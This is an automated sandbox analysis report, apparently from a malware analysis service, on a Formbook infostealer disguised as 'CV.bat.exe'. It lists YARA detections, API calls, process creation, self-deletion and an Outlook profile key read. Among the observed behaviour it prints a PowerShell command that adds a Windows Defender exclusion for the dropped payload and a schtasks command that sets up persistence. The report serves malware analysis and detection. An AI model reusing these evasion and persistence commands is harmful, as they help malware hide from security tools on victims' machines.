Source: 00000011.00000002.522661279.0000000000D90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: CV.bat.exe PID: 5060, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: chkdsk.exe PID: 1264, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 0_2_00EBE9E3
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 0_2_00EBE9F0
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 0_2_00EBCA4C
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 0_2_04E4AED8
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01240D20
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01264120
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0124F900
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01312D07
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01311D55
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01272581
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0125D5E0
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_013125DD
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01301002
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0125841F
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0130D466
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012720A0
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_013120A8
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0125B090
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_013128EC
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01312B28
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0127EBB0
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01311FF1
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0130DBD2
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01266E30
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_013122AE
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01312EF7
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_004012A3
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_004219A0
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_00421A9A
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_004012B4
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0042134D
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_004044C7
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_004044BE
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0040B513
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0040B517
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_00422672
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_004046E7
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0040FF57

Source: C:\Users\user\Desktop\CV.bat.exe

Code function: String function: 0124B150 appears 35 times

Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289540 NtReadFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012899A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012895D0 NtClose,LdrInitializeThunk,
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012898F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012897A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012896E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289520 NtWaitForSingleObject,
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0128AD30 NtSetContextThread,
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289560 NtWriteFile,
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289950 NtQueueApcThread,
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012895F0 NtQueryInformationFile,
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012899D0 NtCreateProcessEx,
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289820 NtEnumerateKey,
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0128B040 NtSuspendThread,
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012898A0 NtWriteVirtualMemory,
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289730 NtQueryVirtualMemory,
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289B00 NtSetValueKey,
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0128A710 NtOpenProcessToken,
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289760 NtOpenProcess,
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289770 NtSetInformationFile,
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0128A770 NtOpenThread,
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0128A3B0 NtGetContextThread,
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289610 NtEnumerateValueKey,
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289A10 NtQuerySection,
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289670 NtQueryInformationProcess,
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289650 NtQueryValueKey,
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_01289A80 NtOpenDirectoryObject,
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_012896D0 NtCreateKey,
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0041E057 NtClose,
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0041E107 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_004012A3 NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0041DF27 NtCreateFile,
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0041DFD7 NtReadFile,
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0041E183 NtAllocateVirtualMemory,
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_004012B4 NtProtectVirtualMemory,
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_004014E9 NtProtectVirtualMemory,

Source: CV.bat.exe, 00000000.00000002.314709188.0000000006FA0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameWebName.dll4 vs CV.bat.exe
Source: CV.bat.exe, 00000000.00000002.302340315.00000000027D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs CV.bat.exe
Source: CV.bat.exe, 00000000.00000002.302340315.00000000027D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWebName.dll4 vs CV.bat.exe
Source: CV.bat.exe, 00000000.00000000.255904750.0000000000432000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameCuHs.exeL vs CV.bat.exe
Source: CV.bat.exe, 00000000.00000002.306226428.0000000003890000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMetal.dllJ vs CV.bat.exe
Source: CV.bat.exe, 00000000.00000002.305574827.00000000037D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTargetParameterCount.dll> vs CV.bat.exe
Source: CV.bat.exe, 00000000.00000002.314741085.0000000007170000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMetal.dllJ vs CV.bat.exe
Source: CV.bat.exe, 00000008.00000003.303017091.000000000119F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs CV.bat.exe
Source: CV.bat.exe, 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs CV.bat.exe
Source: CV.bat.exe, 00000008.00000003.299197168.0000000001006000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs CV.bat.exe
Source: CV.bat.exe	Binary or memory string: OriginalFilenameCuHs.exeL vs CV.bat.exe

Source: CV.bat.exe	ReversingLabs: Detection: 33%
Source: CV.bat.exe	Virustotal: Detection: 34%

Source: C:\Users\user\Desktop\CV.bat.exe

File read: C:\Users\user\Desktop\CV.bat.exe

Jump to behavior

Source: CV.bat.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\CV.bat.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: unknown	Process created: C:\Users\user\Desktop\CV.bat.exe C:\Users\user\Desktop\CV.bat.exe
Source: C:\Users\user\Desktop\CV.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PzKpucfDtCCmww.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\CV.bat.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PzKpucfDtCCmww" /XML "C:\Users\user\AppData\Local\Temp\tmpE00F.tmp
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\CV.bat.exe	Process created: C:\Users\user\Desktop\CV.bat.exe C:\Users\user\Desktop\CV.bat.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
Source: C:\Users\user\Desktop\CV.bat.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\PzKpucfDtCCmww.exe
Source: C:\Users\user\Desktop\CV.bat.exe	Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PzKpucfDtCCmww" /XML "C:\Users\user\AppData\Local\Temp\tmpE00F.tmp
Source: C:\Users\user\Desktop\CV.bat.exe	Process created: C:\Users\user\Desktop\CV.bat.exe C:\Users\user\Desktop\CV.bat.exe

Source: C:\Users\user\Desktop\CV.bat.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Source: C:\Users\user\Desktop\CV.bat.exe

File created: C:\Users\user\AppData\Roaming\PzKpucfDtCCmww.exe

Jump to behavior

Source: C:\Users\user\Desktop\CV.bat.exe

File created: C:\Users\user\AppData\Local\Temp\tmpE00F.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@10/8@6/2

Source: C:\Users\user\Desktop\CV.bat.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: CV.bat.exe	Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\CV.bat.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5908:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5152:120:WilError_01

Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\CV.bat.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Windows\SysWOW64\chkdsk.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Source: CV.bat.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: CV.bat.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: wntdll.pdbUGP source: CV.bat.exe, 00000008.00000003.301579831.0000000001080000.00000004.00000800.00020000.00000000.sdmp, CV.bat.exe, 00000008.00000003.297213118.0000000000EF0000.00000004.00000800.00020000.00000000.sdmp, CV.bat.exe, 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000003.417519841.00000000054B4000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000002.531741340.0000000005800000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000003.421300076.000000000566D000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000002.533143376.000000000591F000.00000040.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: CV.bat.exe, CV.bat.exe, 00000008.00000003.301579831.0000000001080000.00000004.00000800.00020000.00000000.sdmp, CV.bat.exe, 00000008.00000003.297213118.0000000000EF0000.00000004.00000800.00020000.00000000.sdmp, CV.bat.exe, 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000003.417519841.00000000054B4000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000002.531741340.0000000005800000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000003.421300076.000000000566D000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000011.00000002.533143376.000000000591F000.00000040.00000800.00020000.00000000.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: CV.bat.exe, NetworkArithmeticGame/Form1.cs	.Net Code: UYR0010453 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: PzKpucfDtCCmww.exe.0.dr, NetworkArithmeticGame/Form1.cs	.Net Code: UYR0010453 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.CV.bat.exe.430000.0.unpack, NetworkArithmeticGame/Form1.cs	.Net Code: UYR0010453 System.Reflection.Assembly System.AppDomain::Load(System.Byte[])

Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0129D0D1 push ecx; ret
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0042125C push eax; ret
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_0040C21E push esp; retf
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_004212A9 push eax; ret
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_004212B2 push eax; ret
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_00421313 push eax; ret
Source: C:\Users\user\Desktop\CV.bat.exe	Code function: 8_2_004223AD push ecx; retf

Source: C:\Users\user\Desktop\CV.bat.exe

File created: C:\Users\user\AppData\Roaming\PzKpucfDtCCmww.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\CV.bat.exe

Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\PzKpucfDtCCmww" /XML "C:\Users\user\AppData\Local\Temp\tmpE00F.tmp

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\SysWOW64\chkdsk.exe

File deleted: c:\users\user\desktop\cv.bat.exe

Jump to behavior

Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\CV.bat.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
